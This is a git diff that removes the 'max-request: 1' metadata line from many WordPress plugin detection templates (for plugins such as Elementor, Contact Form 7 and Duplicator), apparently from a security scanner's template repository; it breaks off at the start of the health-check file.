diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
